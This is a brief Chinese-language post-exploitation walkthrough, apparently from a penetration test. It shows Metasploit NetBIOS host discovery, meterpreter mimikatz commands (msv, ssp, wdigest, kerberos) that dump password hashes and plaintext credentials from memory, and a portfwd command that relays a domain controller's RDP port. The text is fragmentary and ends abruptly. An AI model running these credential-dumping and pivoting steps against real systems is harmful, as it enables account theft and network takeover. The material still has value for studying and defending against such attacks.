1.使用msf自带netbios扫描内存活机器,发现存活机器两台,地址分别为***和***
通过msf中的mimikatz抓取用户名密码
1、确认shell权限
确认shell为system权限,可以使用mimikatz抓取明文密码
2、加载mimikatz load mimikatz
3、使用mimikatz抓取密码
meterpreter > msv 获取的是hash值meterpreter > ssp 获取的是明文信息meterpreter > wdigest 读取内存中存放的账号密码明文信息meterpreter > kerberos 读取内存中存放的账号密码明文信息
拿下域控权限
msf提供端口转发模块,具体命令如下 portfwd-l:本地监听端口-r:内网目标的ip-p:内网目标的端口执行命令:portfwd add -l 9999 -r *** -p 3389;将内网***的3389端口代理到9999端口
连接***
|